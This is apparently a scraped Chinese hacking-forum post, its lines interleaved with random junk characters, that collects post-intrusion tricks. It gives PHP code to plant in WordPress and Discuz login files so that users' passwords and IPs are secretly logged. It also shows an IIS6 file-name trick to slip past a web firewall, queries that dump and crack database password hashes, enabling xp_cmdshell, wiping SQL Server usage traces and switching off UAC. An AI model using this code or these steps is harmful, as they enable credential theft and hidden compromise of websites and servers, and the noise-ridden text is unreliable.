if($log_user&&$log_pwd&&$log_ip){: X, w5 W2 d) X$ H
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
5 X$ c0 {( w: k+ n6 A* R$ c$ y* |$ W2 g}
4 T. a' Y" j' i6 M当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。% I: ^8 S$ U3 {9 O; D7 L% K
就是搜索case ‘login’
! m% _% h4 v1 S& g在它下面直接插入即可,记录的密码生成在pwd.txt中,
( ~; \- N5 I4 Q! ~, j' x$ h0 w其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
# [7 ]/ G& L: c8 p$ K' Z利用II6文件解析漏洞绕过安全狗代码:
0 n- }# I# u0 w. P; F# B0 U;antian365.asp;antian365.jpg
2 r4 p* {, m: {) N
1 s, O5 ?" t, V5 t0 x各种类型数据库抓HASH破解最高权限密码!8 W. }3 x; ]* M6 ?, S* F/ r3 D
1.sql server2000
6 ^% S) M6 G" }# S8 t3 q9 O) JSELECT password from master.dbo.sysxlogins where name='sa'1 l9 K6 ~( i3 F' B
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341! @: v# t" n2 q/ R
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
) h* d9 K: t5 j, t0 e0 A$ k* j( ?* x; f$ `) X/ I
0×0100- constant header
* Y* ]( `, i( n$ G& K34767D5C- salt5 `8 c/ j, ]( v0 z) m+ ~& e
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
* L, P5 |* V8 M, D2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash. J" b( E  L3 a+ W) z
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
) C! [" K: w4 j: [SQL server 2005:-5 f; R- x  i7 p
SELECT password_hash FROM sys.sql_logins where name='sa'
6 E, Y) H% g- S0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
! X& n- t! d9 Z0 D6 f2 }! c0×0100- constant header
  M/ J% x5 r6 c6 s( Q; D993BF231-salt
# _5 M0 |' e9 F# F1 P5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; t9 ]3 Z7 U  }: S* Qcrack case sensitive hash in cain, try brute force and dictionary based attacks.2 v$ E- z& f( d, x7 M9 K

; z" k1 v8 D! V; K, Y$ ~update:- following bernardo’s comments:-
# g- r. b$ C: `, Q* j& R# \use function fn_varbintohexstr() to cast password in a hex string.0 L  Q% x# M8 j9 r% H/ @7 k* @
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
* ^( l' ~4 j9 c( H0 |5 C+ o! _, I0 ?. G5 U" k( g. [% h
MYSQL:-
  B* ?  j8 ?/ z1 W( h
1 m( P$ b! U3 \& {7 O7 rIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
; F, M- ?, n% p: E' Z% t1 H* A7 j5 j8 x! w1 j
*mysql  < 4.1( _' {, _; y# T* @( w; ^

: e1 I& P+ |1 F" i: Nmysql> SELECT PASSWORD(‘mypass’);
. ~9 s/ U+ u. Z4 e; ?3 c4 J+——————–+
% U: n1 Z  y3 D! R. W  |; N" @0 B) B| PASSWORD(‘mypass’) |
4 E/ f; M2 ^. w' p( D  K& e& G4 j+——————–+
7 t% z  W5 _  y6 s) O) {$ u| 6f8c114b58f2ce9e   |
  e$ g' v# F: X) O( V: e6 M, m+——————–+
4 ?0 |. _3 ]1 h( f, U0 K0 V( l( N1 [4 n/ ?. w4 O# Z0 k+ A& B
*mysql >=4.1
+ {) A/ e! R/ m% v+ b6 D( w
. @, `$ s" q- i, I& R6 [3 P* |8 `mysql> SELECT PASSWORD(‘mypass’);
  X* m& M, D  X* f- x( B- M+——————————————-+
! Y) [; k$ D" j5 M/ ]" g| PASSWORD(‘mypass’)                        |
' V9 P/ c+ W) x9 j+——————————————-+2 g; k" Y# x( ]# A  G: z4 U# u
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |$ Y% K8 \0 W) _. J/ U1 n
+——————————————-+
3 V2 g% p& ?) ?: ]9 B! O* T# e' a
- f6 l! H3 }) wSelect user, password from mysql.user
6 S+ G: k5 G0 x  t; zThe hashes can be cracked in ‘cain and abel’
/ v) x+ n9 j( v6 t) V
- e. w6 x& S; M: t7 vPostgres:-
- g1 N  \( e7 c8 T! q2 W& W/ l: mPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)- V9 A- z1 U8 Q9 o) Q% k/ @5 e; \3 C
select usename, passwd from pg_shadow;7 i& q% k6 i" n0 n- l* h" K. B% J' g
usename      |  passwd
. s& V2 G: ]9 h8 ]" c——————+————————————-
1 X3 e0 \& [8 A" ftestuser            | md5fabb6d7172aadfda4753bf0507ed43960 `+ r+ o. E. h* D5 j
use mdcrack to crack these hashes:-0 _5 w% S, s/ n/ ^5 k: k
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
( U, `  s: B" C% }8 X, g
& B% T: F$ R2 |9 o6 V" h( m/ ^6 |Oracle:-
$ O9 |4 T7 B0 t+ a0 ]. f4 gselect name, password, spare4 from sys.user$
5 A; f9 ]8 K7 Q. l: {hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
% x& S; j# x" |5 g# [More on Oracle later, i am a bit bored….
8 \; p3 g5 f0 ]$ u1 p: {; I5 a; `0 @" ^
3 V( N8 i, n$ t1 F8 P
在sql server2005/2008中开启xp_cmdshell
  v7 p! L) p' v/ A" X* T" s( r, M-- To allow advanced options to be changed.- q$ v! P4 b" b" P" x
EXEC sp_configure 'show advanced options', 1/ M& v. G2 V! p
GO( c2 I( B$ M" K$ d3 w7 O
-- To update the currently configured value for advanced options.
7 i) k7 f& h( ^) bRECONFIGURE
% ?, h1 }- s" Y# \3 NGO
: X' y! _( \" L1 b-- To enable the feature.; t: f2 J. Z2 [6 Q5 X
EXEC sp_configure 'xp_cmdshell', 1
; e& B4 _, c1 B1 H) B. [( jGO
9 {6 t  |$ s! q0 W5 C-- To update the currently configured value for this feature.
, @/ g) L# D6 ^RECONFIGURE
- A; l3 a3 r5 Q) g0 ^GO8 k* _( i( O( o+ `8 x; ^
SQL 2008 server日志清除,在清楚前一定要备份。
1 t+ M0 Q3 i0 D5 G" m如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
& O) ]8 Q; f- NX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin. @" J  H6 u" X

. q) Y! R8 m: R: ~对于SQL Server 2008以前的版本:
3 D0 S# y, Y9 @; L+ k# R- \2 WSQL Server 2005:
" D6 A! m% ^# T- C* L7 Q删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
5 s1 l+ F9 x3 o- y8 ]7 `, @1 ^SQL Server 2000:
$ s$ F" ]) f+ X0 s: r% T清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
4 W7 u" ]5 W3 |, _) @" v, O2 n+ J8 F4 c( V/ c1 i
本帖最后由 simeon 于 2013-1-3 09:51 编辑$ i9 o0 s0 |4 N: U7 x% m+ Z$ p

. x( E. q9 M" S; R$ I- h6 z
$ b4 z/ W; o- h. |  E. ?' dwindows 2008 文件权限修改
& f* l0 d3 U1 [7 W# b1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx" q" W  g$ C* A/ r4 G- w5 T0 U
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
$ D) z0 I7 ?5 `" t1 k一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,% L4 ]; f- I! R: |! L

0 l( @3 H4 c: g5 f9 NWindows Registry Editor Version 5.00
( _# [/ y: u: u- K5 T[HKEY_CLASSES_ROOT\*\shell\runas]
( \" M+ ]$ r5 z* l) e@="管理员取得所有权"
. _5 l, B: F' o' V7 @: O"NoWorkingDirectory"=""" l) c* S) j% ^' `, f
[HKEY_CLASSES_ROOT\*\shell\runas\command]
; }- U% |* ~/ i9 g: e* x; A: z5 p@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 W0 A/ P) e: [, A
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 C3 ]" t( d" [5 K[HKEY_CLASSES_ROOT\exefile\shell\runas2]* [) n: r0 B1 [, c( F6 n. H$ h
@="管理员取得所有权"
4 d5 {! s+ r$ ?7 }+ L6 W"NoWorkingDirectory"=""
6 ^) e7 x/ j, E; w[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
9 z, E5 \# T' @  O! c@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
; V! ?4 x+ i# j8 H" I9 v9 N"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* D% w0 R% s' H- K' r. X' ~8 q! d4 O4 q" _' s6 g+ `& Q
[HKEY_CLASSES_ROOT\Directory\shell\runas]! c1 T5 U7 K  Q0 ~2 _. P. j  `
@="管理员取得所有权"1 m/ r' L" b4 l
"NoWorkingDirectory"=""$ a! K5 u' [/ @: e8 d' |
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]# F# F4 \1 I3 r. P3 A  Q- ?; L% @
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t": i* H6 z/ H. s% W1 [% z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. T- o$ F$ R+ N! q
. W+ I! P9 S) q' J& L) A, H
5 ?4 J# V6 z+ K% l! C* Vwin7右键“管理员取得所有权”.reg导入- ?3 s: L! b0 F. u
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
% F) g3 r1 a: z+ X& D( ~1、C:\Windows这个路径的“notepad.exe”不需要替换
# ~( \9 z) u5 x( |  x- ^4 q0 O% @2、C:\Windows\System32这个路径的“notepad.exe”不需要替换8 A" K# Q; x  C9 F1 X9 P2 W0 A- _
3、四个“notepad.exe.mui”不要管
" M% W! ]5 \+ f7 P. U. u4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和/ \$ _& u$ g# b$ m, U) n0 e
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”/ J4 J( L# V2 ~: H/ b8 x
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,. W% R0 |1 X+ V' u  P' L' i
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
; U1 w8 N7 {8 P! F! ~3 C3 Nwindows 2008中关闭安全策略:
6 `! g  [7 h. S: q0 Z1 `  t6 m. nreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
/ z- A  ?( Y4 |" ]( Z4 B修改uc_client目录下的client.php 在0 S$ H, Z( @. f. |
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
7 o0 b$ Y9 ]3 o) i下加入如上代码,在网站./data/cache/目录下自动生成csslog.php( Y! w. I% L$ f4 [
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw8 i9 f% V4 H& _$ d! J2 `
if(getenv('HTTP_CLIENT_IP')) {* J3 j! P- `5 v4 ?5 c
$onlineip = getenv('HTTP_CLIENT_IP');) |1 T$ ^1 K5 m. e; _
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
3 ?& q' i; ~+ j4 ]9 `5 G! A$onlineip = getenv('HTTP_X_FORWARDED_FOR');
  O/ f/ ]* S' F- E3 _" J} elseif(getenv('REMOTE_ADDR')) {: m5 P/ n6 G0 j
$onlineip = getenv('REMOTE_ADDR');
# K6 p  h& y) M: H+ G* r} else {
3 l' H" x, _# u$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
" d. I) {2 R: z1 [( o}/ i, u8 \$ A4 E6 i  ^2 W
     $showtime=date("Y-m-d H:i:s");# Y$ D# N6 Y- O: X7 e. g: ^3 P
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";, [9 r( }" P- o/ B
    $handle=fopen('./data/cache/csslog.php','a+');% D3 ]; T, i0 k1 r4 b5 @+ Z( G
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表